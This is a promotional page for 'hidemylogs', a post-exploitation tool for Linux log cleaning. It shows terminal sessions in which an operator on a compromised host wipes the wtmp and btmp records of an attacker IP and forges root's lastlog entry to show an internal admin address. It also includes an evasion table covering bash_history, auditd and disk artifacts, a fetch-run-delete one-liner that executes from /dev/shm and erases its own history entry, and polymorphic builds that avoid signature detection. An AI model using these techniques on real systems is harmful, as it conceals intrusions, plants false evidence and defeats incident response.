BIOS POST... OK Loading kernel modules... [utmp] [wtmp] [btmp] [lastlog] Initializing struct parsers... 384B utmp / 292B lastlog Checking target permissions... requires root or CAP_DAC_OVERRIDE Disabling auditd trace... compiled binary, single execve [READY] hidemylogs v1.0.0 - surgical log cleaner 
 _     _     _                       _
| |__ (_) __| | ___ _ __ ___  _   _| | ___   __ _ ___
| '_ \| |/ _` |/ _ \ '_ ` _ \| | | | |/ _ \ / _` / __|
| | | | | (_| |  __/ | | | | | |_| | | (_) | (_| \__ \
|_| |_|_|\__,_|\___|_| |_| |_|\__, |_|\___/ \__, |___/
                               |___/         |___/
post-exploitation log cleaner // rust // zero dependencies // preserve metadata
recon - read target logs
operator@c2 - recon
root@target:~# ./hidemylogs print -s uwbl === wtmp === admin pts/2 10.0.1.101 2026-03-27 14:22 LOGIN 12001 dev pts/3 10.0.1.102 2026-03-26 08:45 LOGIN 12050 root pts/0 185.220.101.34 2026-03-28 03:47 LOGIN 31337 <-- you are here svc_bak pts/6 45.153.160.140 2026-03-28 03:52 LOGIN 31338 implant pts/7 185.220.101.34 2026-03-28 04:01 LOGIN 31339 === btmp === root ssh 185.220.101.34 2026-03-28 03:41 x7 attempts admin ssh 185.220.101.34 2026-03-28 03:43 x2 attempts === lastlog === UID 0 pts/0 185.220.101.34 2026-03-28 03:47
clean - erase your tracks
operator@c2 - wipe
root@target:~# ./hidemylogs wipe -a 185.220.101.34 -s uwb --dry-run [DRY RUN] No files will be modified. [DRY] Would wipe: root pts/0 185.220.101.34 03:47 [DRY] Would wipe: implant pts/7 185.220.101.34 04:01 [DRY] Would wipe: root ssh:notty 185.220.101.34 03:41 (x3 btmp) [DRY] Would wipe: admin ssh:notty 185.220.101.34 03:43 (x2 btmp) [+] 7 record(s) would be wiped root@target:~# ./hidemylogs wipe -a 185.220.101.34 -s uwb [+] 5 record(s) wiped from wtmp [+] 2 record(s) wiped from btmp [*] Total: 7 record(s) wiped
forge - plant false evidence
operator@c2 - forge
root@target:~# ./hidemylogs forge --uid 0 -t "2026-03-15 09:30:00" --line pts/0 --host 10.0.1.50 [+] Forged lastlog for UID 0: pts/0 from 10.0.1.50 at 2026-03-15 09:30:00 Before: root last login from 185.220.101.34 at 03:47 (Tor exit node) After: root last login from 10.0.1.50 at 09:30 (internal admin IP)
verify - confirm clean state
operator@c2 - verify
root@target:~# last | head -5 admin pts/2 10.0.1.101 Thu Mar 27 14:22 still logged in dev pts/3 10.0.1.102 Wed Mar 26 08:45 - 12:30 (03:45) <-- no trace of 185.220.101.34 root@target:~# lastlog | grep root root pts/0 10.0.1.50 Sat Mar 15 09:30:00 2026 <-- forged, looks normal root@target:~# lastb | head btmp begins Thu Mar 27 00:00:00 2026 <-- brute force attempts gone
supported targets

utmp

Current sessions. Read by who, w.

wtmp

Login/logout history. Read by last.

btmp

Failed login attempts. Read by lastb.

lastlog

Last login per UID. Read by lastlog. Supports wipe + forge.

opsec notes
VectorShell scripthidemylogs (binary)
.bash_historyEvery command loggedSingle execve
auditdMultiple syscalls per opDirect read/write/lseek
ps / procInterpreter visibleBinary name only
Disk artifacts.py/.sh persistsRun from /dev/shm, delete
DependenciesPython/Bash requiredmusl static, zero deps
File timestampsmtime changesatime+mtime restored
deploy - opsec one-liner
operator@c2 - deploy
# Standard musl build (prefix space = not saved in bash_history) $ f=$(head -c6 /dev/urandom|xxd -p);curl -sL https://github.com/franckferman/hidemylogs/releases/latest/download/hidemylogs-linux-x86_64-musl -o /dev/shm/$f;chmod +x /dev/shm/$f;/dev/shm/$f print;rm -f /dev/shm/$f;unset f;history -d $(history 1|awk '{print $1}') # Polymorphic build (unique hash per release) $ f=$(head -c6 /dev/urandom|xxd -p);curl -sL https://github.com/franckferman/hidemylogs/releases/latest/download/hidemylogs-linux-x86_64-musl-poly -o /dev/shm/$f;chmod +x /dev/shm/$f;/dev/shm/$f print;rm -f /dev/shm/$f;unset f;history -d $(history 1|awk '{print $1}') # What this does: # 1. Generate random 12-char hex name # 2. Download musl binary to /dev/shm (tmpfs, not on disk) # 3. Execute # 4. Delete binary + unset variable # 5. No file on disk, random process name in /proc
polymorphic build
operator@c2 - build
# Each build produces a unique hash (different .rodata strings) $ make poly [+] Polymorphic build prepared Build ID: a7f3c9e1b2d4... [+] Polymorphic build complete sha256: b09f893b3483d3a9... $ make poly [+] Polymorphic build complete sha256: 0746f368f053a464... <-- different hash every build
Download Source Docs Detection
hidemylogs v1.0.0 T1070.002 / T1070.006 / T1070.003 franckferman